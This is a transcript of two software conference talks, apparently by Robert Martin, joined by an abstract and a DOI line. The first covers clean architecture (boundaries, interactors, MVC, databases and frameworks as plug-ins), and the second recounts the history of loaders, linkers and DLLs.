was the boundary object. I have drawn them here as interfaces.net interfaces or Java interfaces. Why do we have interfaces? 
Where did this come from, this artifact of these two languages, Java and.net? Why does C-Sharp have interfaces? Yeah, that's a nice way of saying it, but no. C-Sharp has interfaces because Java had interfaces. Why did Java have interfaces? What was the rationale for putting interfaces into Java? Keep in mind that you could make a completely abstract class in Java by saying abstract class, something, and make all of the methods abstract. Why do you need a special keyword to make sure that all of the methods are abstract? Certainly, this is not what we did in C++. In C++, if you wanted a interface, we didn't even have a concept, by the way. But if you wanted an interface in C++, you just had a bunch of pure virtual methods. You just made them all abstract. You didn't bother with some new keyword. Why did we have this keyword in Java? We didn't like multiple inheritance. That was exactly the reason. The authors of the language did not like multiple inheritance. They did like multiple implementation of interfaces, but they didn't like multiple inheritance of classes. Why not? To implement. It's a pain in the butt to implement if you're a compiler writer. They were lazy. They didn't want to implement multiple inheritance. It's hard to do multiple inheritance in a compiler. There's all kinds of horrible ambiguities. The problem can be solved. It was solved in C++. It was solved in Eiffel. It was solved in Lisp. Problem can be solved. By the way, solving that problem is very useful. It would be nice if we had multiple inheritance of implementation. But we don't because the compiler writers were lazy. Then they kind of smoothed it over by saying, oh, but we're protecting you programmers from yourselves because the multiple inheritance is actually really ugly. You know, compiler writers, here's a little clue. I'm an adult. You don't need to protect me from myself. If you're going to be lazy about it, just say you're going to be lazy about it. But don't make up some goofy story about how you're protecting me from myself. All right. I'm ranting. Sorry. These boundaries are interfaces. Now, notice the pattern of usage here. The interactor implements one of the interfaces. This is the input boundary. All data comes in through that boundary and gets polymorphically deployed inside the interactor. This is the output boundary. All data goes out through that boundary. Notice that all of the dependencies point outwards. That's important. We'll come to that a little later. These are the three objects that Jacobson identified in his architecture in 1992. Something happened. We had this. It was part of our culture. Everybody was talking about this book. Everybody was talking about the BCE model, the boundary controller entity model, which I've turned into the boundary interactor entity model. The BCE model, really important, blah, blah, blah. It was a very big deal. Then something happened. Does anybody know what that was? Think back in time. What was happening right around 1993, 94, 95? What strange thing was happening to our industry? Some of you weren't born then. Well, most of you were probably born then. Some of you were probably still in grade school. The web happened. The web happened in 1993, 94, 95, 96, and the whole development world turned upside down. All of a sudden, everything changed. That's what we thought. We thought everything changed. Everything changed. We had to hire people, lots and lots and lots of people. If you had a J in your name, you could get hired as a Java programmer. 
We hired rafts and rafts of people. Kids went to school to become programmers because they could get rich overnight by day trading on the web. It was not a very healthy time. We're seeing some echo of that right now in the social networking communities. There's a bubble going on in the social networkers. I don't know if it'll pop the way that the dot com bubble popped. I kind of hope it doesn't. I kind of fear it will. Although the pop of that bubble will not be quite as damaging as the pop of the dot com bubble. Does anybody remember 2001? Remember that you had a job one day. You did not have a job the next day and had no idea when you would get a job the next day. If you were unlucky enough to be working at a company that was very successful the day before, you probably owed the IRS several million dollars and had no way to pay it the day after. There's quite a few people who went completely bankrupt because their stock options had made their wealth look very large and then after the crash, the IRS said, wow, you still have to pay taxes on that, even though there was no money there. Lots of programmers were walking around holding signs, you know, will code for food. It was not a good time and it was a very scary time. And during that time, we were building systems still. But we were frightened and scared and it was a time of deep insecurity. So anytime anybody came along with something that might help, we would grab it. What might help? J2EE. A framework might help. A new platform might help. What was one of the early ones? JSF, that was kind of later. Struts. Anybody remember struts? Anybody remember these frames? We would grab onto them. Oh, good, something to help because, you know, if we don't get things written really fast, we're going to lose our jobs and that's really bad. And during all of that turmoil and chaos, we forgot about this. It went away. Forward space now. 2003, 2004, 2005. One of the frameworks that pops up pops up in the Ruby space. Do you have any Ruby programmers in the room? A couple. Okay, good. There should be a lot more of you. Part of the symptom of the social networking bubble is that in the United States anyway, if you can write Ruby code, then you can write any number on a piece of paper and someone will pay that number to you because there aren't enough Ruby programmers right now. So in the U.S., Ruby programmers that are at a high premium, I have seen whole companies purchased for many millions of dollars for the purpose of getting the Ruby programmers. Screw the business model, throw all the customers away, just give me those Ruby programmers and sign them to a contract for two years. I think that bubble is going to pop. Never mind that. If you are not familiar with Ruby, you probably should be at this point because this language is getting more and more important and we'll continue to get more and more important. Languages have this tendency to rise and fall. If you're a long-term programmer, you want to be a career programmer, you have to recognize when a language is starting to rise and you have to kind of watch it and learn it. Then at just the right time, you're kind of surfing these waves of languages and you're surfing the Java wave or the.NET wave, but the Ruby wave is out there and you know enough about it and at just the right moment, you leap onto the new wave before the old wave goes down. You don't want to ride those waves down. It's not pretty down there. 
So 2004, 2005, 2006, in the Ruby community, this guy by the name of David Heinemeier Hansson, brilliant fellow, invents a framework called Rails. And this really turns the Ruby community on its head because all of a sudden it was very easy to get initial web applications working with Rails. It was really a matter of typing a command or two, writing a few lines of code and you had a website up. Didn't do much, but then you could very easily incrementally develop this website and the development time was fast and you could do this, do that, it was like magic. Of course, like all frameworks, it had its limitations and to do any kind of significant website was not nearly that easy, but still, it was very, very powerful. The Rails way of thinking carried a lot of baggage with it, just like any framework does. If you are a Struts developer, the Struts way of thinking carries a lot of baggage with it. If you're a .NET developer, the framework in .NET carries a lot of baggage with it. There's this stuff that you are supposed to do, these classes you are supposed to inherit from, these other classes you are supposed to use, and it dominates you. And all the examples you read show how you are directly using this framework to get stuff done. And none of that pays any attention to this. So this disappears, it fades into the background. How should this work? Well, I've got a user out here. This guy is using the web, if we call that the web, it's some delivery mechanism, I really don't care if it's the web or not. And this delivery mechanism, somehow or another, walks through these boundaries to my interactors, which talk to my entities. Now, let's trace a command through. The user does something, he fills out a form and he pushes a button. And what happens is that the delivery mechanism does whatever it does to validate the data, and God knows what else it does, but then it creates a request model. This request model is a data structure. It is a plain data structure. It does not know about the web. There's nothing in it that knows about the web. It does not derive from any framework based on the web. It is not an instance of HTTP request, it is just a data structure. In the simplest case, it's an argument list to a method in the boundary object. In the more complex case, it's just a plain old Java or .NET object that gets passed in to the boundary object. It polymorphically deploys into the interactor. And the interactor looks at it and says, oh, I guess I've got to do some work. So it uses the data in that request model to start calling methods on the entities. The interactor controls the dance of the entities. It is the choreographer of the methods that go out to the entities. And once the job is complete, the interactor reverses the flow and starts pulling data back out of the entities to construct another data structure called a result model, or a response model, if you wish. The result model is still just another raw data structure, no trappings of the web, no knowledge of the web. The result data structure goes back through the boundary into the delivery mechanism where the delivery mechanism displays it somehow or another. Can you test that stuff without the delivery mechanism? Of course you can, right? You pass the data structure in, you get the data structure out, you look at the data structure. Does the web server have to be running if you're a web application? No, this is by the way the goal, one of the goals. You should be able to test all your business rules without the web server running.
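A minimal sketch of what such a test can look like, continuing the hypothetical create-order names from the earlier sketch; no web server, no HTTP types, just a data structure in and a data structure out.

using System;

// A plain test against the input boundary. Nothing here knows the web exists.
public class CreateOrderTests
{
    public void CreatesAnOrderAndReturnsItsId()
    {
        ICreateOrderInputBoundary useCase = new CreateOrderInteractor();

        var request = new CreateOrderRequest { CustomerId = 7, ProductId = 3, Quantity = 2 };
        CreateOrderResponse response = useCase.Execute(request);

        if (response.OrderId <= 0)
            throw new Exception("expected an order id");   // swap in your favorite test framework's assert
    }
}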
Web servers are a pain. They get in the way, they take a long time to boot, they take a long time to tear down, there's all kinds of configuration, testing while they're running is a pain. I would like to just test all my business rules by passing a data structure in, getting a data structure out. Real easy. Without any other stuff running, I don't want any other processes running, I don't want the web server running, I don't want my framework in the way, I just want to be able to test my business rules. What about Model View Controller? I thought that was the architecture of the web. Of course we fiddled with it, then we turned it into Model View Presenter and Model View Presenter Control and Model View View Model and MVVM and all these other things. Where did this Model View Controller thing come from? It came from him. I cannot say his name properly, you can probably say it better than I, I would say it Trygve Reenskaug. I'm probably saying it wrong. I met him last year, here at NDC, he gave a talk here. I was up in the speaker lounge and I was looking for a place to plug my laptop in and I'm wandering around looking for a place and this guy, old guy hands me a power strip and I look up and it's Trygve Reenskaug and I take the power strip from him and our hands brush, my finger touches his, and I haven't washed that finger. It's Trygve Reenskaug. This guy invented Model View Controller in the 70s in Smalltalk and the way Model View Controller worked back then, very simple, we would have some small object which encoded a simple business rule, nothing very elaborate or big. These were generally small things, not big things. We would have a view, the view would hang what we would now call an observer relationship on the model. The view would register with the model, the model would call back to the view saying, by the way, something in me changed, you need to update. And again, this was something relatively small and there would be a controller object. The controller object would look at the mouse and keyboard and translate user gestures into commands that were relevant to the model. Input, process, output, real simple kind of pattern. This was used in the small. These objects were small. You would have a Model View Controller for a button. You'd have a Model View Controller for a circle. You'd have a Model View Controller for a radio button, a Model View Controller for a text field. These were little things, not a massive application architecture. We've changed that. And why did we change it? Well, there's this thing that happens in software and it probably happens everywhere. Some name gets associated with good. MVC is good. Now, I'm a guy, a programmer, and whatever I do is good because, well, I'm good. And somebody says, MVC is good. Well, that must be what I do because I'm good. And so, you've heard this done before, right? And, oh, we're doing OO. What's OO? Oh, yeah, I've been doing that for years because, you know, I'm good. So, this is probably what happened here. Something like this because what we now have doesn't look much like Model View Controller to me. This is Model View Controller now as it is done on the web. We have these controller things. Now, controllers are not the first things to look at user input, right? We've got the whole web server out here. First, the web server is doing all the pathing and the routing and the gathering of data and all that gunk.
Once the whole pathway has been resolved, we can finally call a controller with an HTTP request or some equivalent. The controller then goes to the use cases, the business objects, I should say, and it starts telling the business objects what to do. And at some point, the controller hands the control off to the view. And then the view reaches into the business objects and pulls a bunch of junk out of the business object and displays them. And this rat's nest of dependencies is the result. What happens to the business objects in the heat of battle is that they begin to acquire controller-like methods because the controllers need to tell the business objects what to do and the programmers are so busy that they don't remember to keep the controller stuff separate from the business object stuff. So you start getting controller-like stuff in here. And then the guys writing the views need methods on the business objects to get at the data. And you start getting view-like methods in the business objects and the business objects become this kind of hybrid thing of half controller, half business object, half view. I know that adds up to one and a half. And the math works anyway. So probably we have problems here. Now, you can do this well, but most people don't. They're in the midst of a flurry of activity. And the boundaries are not well enough defined to do this well. How do we do it in the clean architecture, the Jacobson architecture? This shows the output channel. Here's our interactor. Our interactor has been working with entities. And it has now created the response model. It's about to send the response model back out to the user interface. The object that implements the output boundary that the interactor communicates with is called a presenter. The job of the presenter is to take the response model and turn it into yet another data structure. This new data structure is called the view model. And the view model is this very interesting data structure that looks like it is targeted at the web if you're in a web application. It looks like it's targeted at the web. It does not know about the web. It does not depend on any of the web frameworks. It is still independent of the web. But if you are putting something on a web page, there is a field in this data structure for every element that would appear on that web page. If you have buttons on the web page that have names, there are strings in here that contain those names. If some of those buttons should be grayed out, there are booleans in here that tell you what the state of those buttons ought to be. If certain numbers ought to be read, there are booleans or enums in here that tell you what the color of certain fields ought to be. Anything that appears on the web page is represented here in the view model in unambiguous and complete ways. The only thing left to do is to put it on the page. And that's what the view does. The view looks at the view model and just says, okay, take that field, put it here, take that field, put it here, take that field, put it here. You might have a loop in here that loops through some table, but you're not going to have any if statements in here or not too many. You might have a if enabled, turn it gray, if not enabled, turn it black. You might have that kind of if statement. But there's no processing in here. The view is so denuded of functionality that it doesn't need to be tested. No automated test needs to be written for it because there's no worthwhile code in here. 
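Here is the output side of the same hypothetical example as a minimal sketch: a presenter that turns the response model into a view model, and a view that does nothing but copy fields onto the screen. The names and fields are invented for illustration.

// Output boundary: the interactor pushes its response model through this.
public interface ICreateOrderOutputBoundary
{
    void Present(CreateOrderResponse response);
}

// View model: one field for every element that will appear on the page, already formatted.
public class OrderViewModel
{
    public string OrderIdText;
    public string ConfirmButtonLabel;
    public bool   ConfirmButtonEnabled;
}

// Presenter: response model in, view model out. No web types anywhere.
public class CreateOrderPresenter : ICreateOrderOutputBoundary
{
    public OrderViewModel ViewModel { get; private set; }

    public void Present(CreateOrderResponse response)
    {
        ViewModel = new OrderViewModel
        {
            OrderIdText = "Order #" + response.OrderId,
            ConfirmButtonLabel = "OK",
            ConfirmButtonEnabled = response.OrderId > 0
        };
    }
}

// The view just moves fields onto the page; there is no logic here worth testing.
public class CreateOrderView
{
    public void Render(OrderViewModel vm)
    {
        Show("orderId", vm.OrderIdText, true);
        Show("confirm", vm.ConfirmButtonLabel, vm.ConfirmButtonEnabled);
    }

    private void Show(string element, string text, bool enabled) { /* put it on the page */ }
}

The presenter can be tested exactly like the interactor: a data structure goes in, a data structure comes out, and nothing about the web needs to be running.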
Of course, that also means it's easy to test if you want to. It's really easy to test something that doesn't have a lot of code in it. Can you test the presenter? Yeah, it takes an input data structure. It creates an output data structure. You can test the presenter. Do you need the web server running to test the presenter? No. You can see a pattern developing here, can't you? What is that pattern? The pattern is this boundary. That boundary, that black line right there is a component boundary. Across that black line, all dependencies must point inwards towards the application. Anything outside of this black line must point inwards. Why? Because the stuff out here is a plug-in to the application. Who's using Resharper? See? We're making progress here. This is good. Visual Studio becomes almost usable if you have Resharper in it. Does Visual Studio know about Resharper? No. Not one line of source code inside of Visual Studio knows that Resharper exists. Resharper is a plug-in. The web should be a plug-in to your application. Not one line of code in your application should know that the web exists. You put the web in a different DLL entirely and you plug it into your application. If you don't like the web, plug something else in. Maybe you'd like a service oriented architecture. God help you using soap. Yikes. But you could plug it in. You want to use a thick client? Plug it in. You want to use a console app? Plug it in. Plug it in across that boundary. Make sure all dependencies point across the line. Now, I'm not naive enough to think that the API created here would serve for both a web and a thick client and a service oriented architecture. There would obviously be some differences across that boundary, but those differences are manageable if you bind the framework to the application you lose control. Here's what the whole thing looks like without the entities. Our controller still exists. We still use Model View Controller, but notice that Model View Controller is entirely on the left side of the line. Our application does not know about Model View Controller because Model View Controller is a delivery pattern. Our controllers live on the left side of the line. They construct these data structures which are passed into the interactor which manipulates the entities which creates response models which the presenter then turns into view models that get viewed. And all of this is testable and all of it's nicely decoupled and all of it is a plug-in architecture. What about the database? Databases. If there is a word that has defined our industry for the last 30 years, if there is a word that strikes fear into the hearts of developers, for the last 30 years that word would probably be database. Does that look familiar to you? The database is the great God, the altar upon which we all worship. The applications are minions to the database. All applications serve the database according to the database rules and the priests of the database are the great DBAs in the sky. We have built this kind of philosophical structure. We have given a lot of weight to the database. The database becomes important. The data model is critical. We have to protect our data assets. Who came up with that lovely term? It's a good marketing line, isn't it? You've got to protect your data assets. Oh, yeah, I guess we do. Pay me millions of dollars. I'll sell you a tool that will protect your data assets. Okay, there's a certain amount of marketing business going on here and it makes perfect sense. 
Why do we have databases? Database processing engines. Why do we have these tools like SQL server, like Oracle? Why do we have them? I mean, what goes into a database? Bits. Bits. We know how to put bits places. We store bits in places. We put bits in memory. Why do we have databases? The reason we have databases is historical. We use to put data on rotating bits of steel coated with a magnetic emulsion. Some of us still do. Is there a rotating memory in this room? Does someone have a disk in their laptop? No one will raise their hand. They don't want to admit that they're living in the early part of the 2000s. But the fact is that the disk is dead. You might have some disks still, but bit by bit the disks are dying. The solid state memories are taking over. I have a half a terabyte of solid state memory in here. The next laptop I have will probably have two terabytes of solid state memory. Terabytes! Terabytes! Do you know what that word means? Can you imagine? Like, I'm this guy in 1977 and I had to buy my first PDP 11 and I had to scope out how big the disks ought to be. And I was just walking around the halls of my company laughing hysterically like the wicked witch of the west. 25 megabytes! Terabytes! The RAM disks. There, they're not RAM disks. I can't call them that. The RAM is coming. And as the RAM comes, you and I will have this interesting option because RAM is not addressed the way disk is. There's no spinning memory. There's no heads. There's no records. There's no sectors. There's no rotational latency. There's no seek time. So we can get at any byte equally fast as any other, which means we don't need the indexes. We don't need the special access methods. We don't need any special software to manage the data that's on some very difficult to use medium because the medium is not difficult to use anymore. It's an address space. And we've got 64 bits of address space. Well, hell, we'll just put it all in RAM and treat it like computer memory. This is what's happening. If I were Oracle, I'd be scared to death because the very foundation of why I exist is evaporating out from under me. We are now moving into the realm where SQL will become something that people don't know how to spell. We won't be using these odd query statements anymore. Even link might start to look antiquated, even though it's very cool and everything. We might suddenly start looking at all data as though it's just part of our memory. What's the worst problem that databases have? The most complicating part of a database? Transactions. You've got to open them. You've got to roll them back. You've got to commit them. You've got to know what goes in them and what doesn't. If you do it wrong, you get concurrent update problems. You get deadlocks unless you've got a good system. This whole business of locking stuff. What if we have so much memory that, and our processes are so fast, that we don't need to ever delete anything again. We don't need to update anything. What we'll do instead is we will simply record every transaction. Just stick every transaction in the database. We will not record the state of an account. We will not record the state of a user. We will not record the state of anything. We will simply record all the transactions. We will recompute state anytime we want. Maybe we'll take a snapshot of state every day and then recompute state on a daily basis or so, but we will not save state. If you don't save state, if all you save are transactions, then you don't have CRUD applications anymore. 
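As a concrete sketch of that transactions-only idea, here is what an append-only account might look like in C#; the names are invented, and this is only the general shape of what people now usually call event sourcing, not anything prescribed here.

using System;
using System.Collections.Generic;

// We never store the balance. We only append transactions and recompute state on demand.
public class Deposit    { public decimal Amount; public DateTime At; }
public class Withdrawal { public decimal Amount; public DateTime At; }

public class AccountLedger
{
    // Create and read only; there is no update and no delete.
    private readonly List<object> _transactions = new List<object>();

    public void Record(object transaction) { _transactions.Add(transaction); }

    // State is a computation over the transaction log, not a stored value.
    public decimal Balance()
    {
        decimal balance = 0m;
        foreach (var t in _transactions)
        {
            if (t is Deposit)         balance += ((Deposit)t).Amount;
            else if (t is Withdrawal) balance -= ((Withdrawal)t).Amount;
        }
        return balance;
    }
}

A daily snapshot, if you want one, is just a cached result of Balance(); the log itself stays append-only.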
There's no updates and there's no deletes. You don't have CRUD applications. You have CRU applications. You can create and you can read. If all you're doing is creating and reading, there's no transactions. Transactions go away. All the concurrency disappears. All that horrible nonsense of committing and rolling back and all that, it just goes away. Is that where we're headed? You use a system like this right now, probably, if you're sane. You have a source code control system. That source code control system works exactly that way. It stores transactions, it does not store state. It reconstructs state every time you check something out. It decomposes that state whenever you check something in. We use a system like this now to manage our code. Maybe it's time our clients got to use a system like that too. In any case, the database is a detail. The database is a place to store bits. The database is not the center of our system. It's just the thing that holds the data. Like any detail, we would like our architecture to treat it like a plug-in. I do not want my application to know that the database exists. I want my application free of any knowledge of the database. I don't want anything about the schema up here. These are not schemas. These are not rows in a table. These are business objects. How they are composed is, I don't care how they're composed. These are not data elements. They are bags full of methods. What is an object? What is an object? Is an object a bunch of data? No. An object is a bunch of methods. You're not allowed to see the data inside. You're not even allowed to know that there's data in there. All you can see of an object are the public methods. An object is a bunch of methods. If there happens to be data inside, that's none of your business. These are bags of methods. I don't know what data they contain. I can't see that. I can't know that. I don't want these guys to know that. I want this stuff to know that. I want some gateway interface that allows my interactors to fetch entities across this boundary. All the database stuff I want living down here. Who's using an hibernator? Hibernator. Some kind of ORM. That stuff lives down here. Not up here. Down here. Below the line with all dependencies pointing upwards. Nothing about the application knows that there's an ORM. The notion of ORM makes no sense to the application. By the way, the notion of ORM makes no sense at all anyway. There's no such thing as an object relational mapping. You cannot map data to functions. What you can do is you can hydrate data structures. That's what an ORM does. It hydrates data structures. It loads them from a database of some kind. I want all the database stuff living down here. I want you to write your applications such that all the business rules are contained in a component or a set of components. Then I want all of the UI stuff to be plug-ins to those components. I want all the database stuff to be plug-ins to those components. If you've got any third party stuff that you're dealing with, plug them into the components. I don't want your application to have outgoing dependencies. Your application is composed of business rules. Those business rules are the family jewels. You keep those jewels in a nice little bag and you don't let people look in. Nobody can look in. You just keep it in there. You keep them isolated. You don't let the frameworks touch them. Frameworks. If you're a framework author, the thing you hope for most is that someone will inherit from your base classes. 
Because once they inherit from your base classes, they have married you without any commitment on your part. You are the sultan. They are the harem. They marry you. You don't marry them. They throw their inheritance relations at you and they are bound to you. It's very difficult to break an inheritance relationship. If you derive from a framework, you are bound to that framework. I don't want you doing that. I don't want you treating a framework as if it were the sultan and you were the harem. I want you to keep the framework at arm's length. Out here somewhere. You can use it. It's all right. You can date it. Don't marry it. Put some little interface in between. Make it a plug-in to your application. Will this hamper you slightly? Oh, it will create some minor inconveniences because, frankly, it's convenient to marry something. But there are costs that you don't want to experience. Keep the frameworks at arm's length. Who is doing dependency injection? Look at that. Everybody is doing dependency injection. It's cool, isn't it? Dependency injection. You get to kind of specify, oh, these objects just come out of nowhere, don't know where they come from. And then who's got an XML file that describes how the dependency injection actually works? Who's got one of those? A few of you. That you've completely lost control of. Who's experienced, you know, the, well, I built the system and it doesn't work. Because the dependency injection configuration is all screwed up. Who has put elements in their source code that denote certain classes are dependency injected? Auto wire statements or things like that. And in .NET these would be the square bracket annotations or attributes, whatever they're called. In Java they're little at sign annotations or attributes, often called auto wire or something like that. I don't want any of that in the business model. I don't want any of that stuff up here. I don't want any source code above the line to know what dependency injection framework we're using. I don't mind dependency injection. I just think it ought to be injected below the line. What exists below the line? Well, one of the modules that exists down there is called main. Main. You remember main? Main is that thing that you write at the beginning in the main program. Main is a plug-in. Main contains the strategy implementations, the factory implementations, the dependency injection specifications, all that concrete horrible stuff that you can then pass through a plug-in connection to the application as abstract entities. Main is a plug-in. The database is a plug-in. The GUI is a plug-in. The frameworks are all kept at arm's length across the plug-in boundary. I want you to think of your application this way. As a group of use cases that describe the intent of the application and then a group of plug-ins that give those use cases access to the outside world. A good architecture is an architecture that allows you to make decisions late. Decisions about the UI. Decisions about the database. Decisions about frameworks. You can make them late because you can implement all the use cases without them. A good architect maximizes the number of decisions not made, the number of decisions that can be deferred until later, because later is always better when you're making decisions. I won't do the rant on TDD because I only have two minutes. Are there any questions? Yeah?
So I'll repeat the question. When I was talking about databases, at one point it sounded like I was talking about Datomic. Datomic is a database engine that works the way I talked about. You can add things to it. You cannot delete. You cannot update. There are many such database engines out there. Datomic is just one of them. I suggest that if you're interested in that kind of stuff, you can look up Datomic. You can look up the work of Greg Young who's been working on this stuff for a long time and start to investigate this idea of transaction-based data rather than state-based data. Anybody else? The lights are in my eyes. All right, I think you can go then. Thank you.
|
So we've heard the message about Clean Code. And we've been practicing TDD for some time now. But what about architecture and design? Don't we have to worry about that? Or is it enough that we keep our functions small and write lots of tests? In this talk, Uncle Bob talks about the next level up. What is the goal of architecture and design? What makes a design clean? How can we evolve our systems towards clean architectures and designs in an incremental Agile way?
|
10.5446/51498 (DOI)
|
Ready? Sound on? Cool. Alright. So, do you see that red dot? Yeah. Yeah. Yeah. Yeah. Yeah. Cool. Alright. So, do you see that red dot? Yeah. Yeah. Why is it red? It's dangerous. I like that answer. Watch out. Take me to Cuba. Yeah. I've had the security people restrict me from going into airports, you know, because I'm carrying lasers with me. They have, you know, a sign on them that says dangerous. But why is that red? I have a green laser. Hey, you know, you got to have lasers. Alright. I carry three of them with me. One of them is red. I always keep them in my backpack with the batteries out of them, or turned around, actually. Yeah. So, this is my red laser. You can get a red laser for $12. There it is. Red laser. Nice. And I got a green laser. This one's a nice one. A pretty bright one, too. Not bright enough to do anything interesting, but bright. There's a little adjustment in here. You can cut a component out and put a different resistor in here, and then you can get almost a quarter watt out of it. The battery drains pretty fast, but you can pop a balloon with it. I mean, that's cool to do. I'd just balloon. But this is my favorite laser. And I like this one because, well, can you see that? I mean, little tiny violet dot. Do you see that up there? Let's see if I can show it to you here. Whoa, that's nice and bright on my thing here. That's nice and bright. But over there, you can hardly see it. Can you see it on this thing? No. Can you see it here? No, not too much. No, can't see it there much. But I found this once. It's just a marker, right? And the little laser doesn't do too much to the marker, but the lid. And look, it's yellow. It's not blue. Can you see that little orange thing there? Watch this. I got to aim it real carefully. Whoa! It's orange. What kind of laser is this? This is a laser of some other color. My glasses are the kind that turn dark in the sunlight. I don't know if you can tell, but now they're all dark. And I can't see any of you. This is an ultraviolet laser. They don't bill it as such. You can buy them on Amazon, $17. They say it's a violet laser. They lie. It's much cooler than a violet laser. It's an ultraviolet laser. Everybody has to have an ultraviolet laser. It's completely useless as a laser pointer. But you can draw nice little pretty pictures on your glasses with it. Wow, I can write my name. All right, whatever. Look at the code on the screen. Anybody recognize that code? I can't see it because my glasses are all dark. Anybody recognize that code? That's PDP-8 code. That's what code looked like in 1970. That's the kind of code I was writing when I was a slightly older teenager. And then on into my 20s as well. And this statement right there. Anybody know what that means? That's the memory address at which this program would be loaded. We used to write the address of our program into our program. This program would be loaded at address 200. And we'd put the data at address 300. How about that? It made perfect sense. Of course you would know where your program is going to get loaded. Who else is going to decide that for you? You, the programmer. You had control over memory. Now, this works fine. I'll show you a sequence of pictures here. Let's see. Yeah, that's a nice one. No, that's not the one I wanted. That's because nowadays when you open up documents, it opens up every document that's been opened by that application. Don't save the dog on. That's the one I wanted right there. Imagine you're a programmer who's writing this kind of code. 
And you've got a program like this one. My program lives here. It starts at address 200. And there's a subroutine library that somebody else has written. Now, by the way, subroutine libraries were not real common. You usually wrote your own subroutines back in those days. But after a while, a few guys would write some useful subroutines and you'd think, you know, I should have those in my program too. And you'd think, well, I'll just compile them in with my code. And that's what we used to do. We'd just take the source code and jam it together. What was the problem with that? We were talking about the 1970s here. Those programs were contained on paper tape. Paper tape was read at 50 characters per second if you were lucky. And so increasing the size of your source code lengthened the size of your compile by minutes. So after a while, these subroutine libraries got too long to continue to add to your source code. So what we did is we would compile the subroutine library and we would load it at location 1200. Then what we could do is we could have a binary file, which got loaded at 1200, and we could have our program at 200 and we'd have a little file that had all the symbols in it. So the symbols would tell us which subroutine was loaded where. So we knew that the get subroutine was at 1205 and the put subroutine was at 1210 and so on. And our symbols would get compiled in with the program. The subroutines would be loaded separately and everything worked fine. What's the problem with this? When's the last time you saw a program that stayed small? They grow. And after a while, well, let's see. I got another picture here. Yeah, that's that one. Oh, yeah. A program that got too big. It overwrites the subroutines. This doesn't work. When your program overwrites the subroutines, your program still thinks that the subroutines are there. So when it calls location 1205, it actually jumps into some arbitrary part of your code. You didn't know this happened, of course, until you finally debug it and realized, oh, my program's gotten too big. What's the solution to this? Your programmers, you can come up with a solution to this. Jump around the subroutine library. Right? You put a jump right there to jump over here. Of course, the subroutine library gets bigger, too. And so after a while, let's see if I've got that picture right. How about that one? Yeah, that's the one. After a while, you get that problem. We actually faced these problems. We actually had to deal with this stuff. And do you know how we solved it? We came up with relocatable code. We said, you know what? This idea of putting the absolute address in the program is killing us. What we'd really like to do is compile our programs without telling them where they're going to be loaded. And then we will tell the loader where to load them. So there's a problem with that. Because that means that your binary files cannot really be binary. They have to have codes in them to tell you that certain addresses are not actually addresses. They are offsets. And the loader has to find every address that's marked as an offset and add the start address to it. But that works. We had relocatable loaders. We made these relocatable binaries and loaders. But now you've got another problem. Because how do you know where the subroutines are? If the subroutines are going to be moving all over the place, how do you know where the subroutines are? So now you have to add more information to the binary file. 
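A minimal sketch of that mechanism, with completely made-up structures and none of the detail of a real PDP-8 format: the image carries a list of word offsets that are really addresses, and the loader adds the chosen load address to each of them.

// Hypothetical relocatable image: code words plus the offsets of the words that hold addresses.
public class RelocatableImage
{
    public int[] Words;                 // the program, compiled as if it were loaded at 0
    public int[] AddressWordOffsets;    // which words are addresses and must be fixed up
}

public static class Loader
{
    // Copy the image into memory at loadAddress, fixing up every flagged address word.
    public static void Load(int[] memory, RelocatableImage image, int loadAddress)
    {
        for (int i = 0; i < image.Words.Length; i++)
            memory[loadAddress + i] = image.Words[i];

        foreach (int offset in image.AddressWordOffsets)
            memory[loadAddress + offset] += loadAddress;   // an offset becomes an absolute address
    }
}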
And this binary file that you thought was just the binary of your program is now becoming this very bizarre file. It's got all kinds of gunk in it. Now you have to put the names of the subroutine library into the binary file of the subroutines. And you have to show what address they will get loaded at. And the relocatable loader has to remember where it put those addresses. And then in the program, you have to have another thing in there that says, hey, I need to know where this program is going to be loaded. And the loader has to link the subroutine library to the program. Computers were slow in those days. Disk drives were very slow. And there wasn't a lot of disk memory. You were lucky if you had megabytes of disk. And the seek arms took a long time. And the rotational latency was high. So link times took a long time, especially as we got more and more libraries, more and bigger programs. Link time could take an hour. Anybody have a link that took an hour? Anybody here working in the 80s? Oh, no, you got one now. You must be a C++ programmer. That says so right on his shirt. Oslo C++ user group. Long link times. Even in the 70s, we had that problem with much smaller programs. So the solution to that was to separate the link phase from the load phase. We would link as a second compile step. And that would produce a final relocatable file that had all the linkages resolved, and then we could load it at runtime. And that was relatively fast enough. And for years and years and years, we lived with this two-step process. Compile down to binary files, then link all the binary files into an executable, and then you could load the executable. And that solved the problem until the 90s. In the 90s, something happened. It was called Moore's Law. What's Moore's Law? The speed of processors will double every 18 months. Now, apply that from about 1970, when the speeds of our processors were half a million instructions per second. And keep that going forward until the 1990s. Well, that's 20 years. How many 18 cycles is that? Well, that's 18-month cycles is that. That's about 15 cycles. So we have a 2 to the 15th increase in speed. Think about that. 2 to the 15th increase in speed, what is that? That's an increase of about 32,000. That's about right, too. Because we went from about a half a megahertz to 2.8 gigahertz. Well, maybe 1 gigahertz by the late 90s. By that time, disks were going faster, too. And we'd spun them up a lot faster in the road. The heads weren't moving as far, and we were getting a lot more bits around the rim, too. Now, we could get what? Hundreds of megabytes on a disk. Oh. And somebody made the bright thought. Somebody had the bright thought that, well, we don't have to do the link separately anymore. We could do the link at the same time we load. Anybody remember ActiveX? Anybody remember Olay? What does DLL stand for? Dynamically linked library, which means it's linked at load time. The link step got moved back into the loader. And we have the situation we have today. Virtually ever. Who's done that program in here? Look at that. A lot of people. Java programmers, raise your hands. Not so many. How come? How come it's all.NET? Oh, maybe it's because it's a.NET-y kind of conference, huh? So, in.NET, you got DLLs, dynamically linked libraries. In Java, you got JAR files. But they're still dynamically linked libraries. Same idea, same purpose. In C++, if you're doing the Microsoft thing, you still got DLLs. If you're doing a Unix thing, you've got shared libraries. 
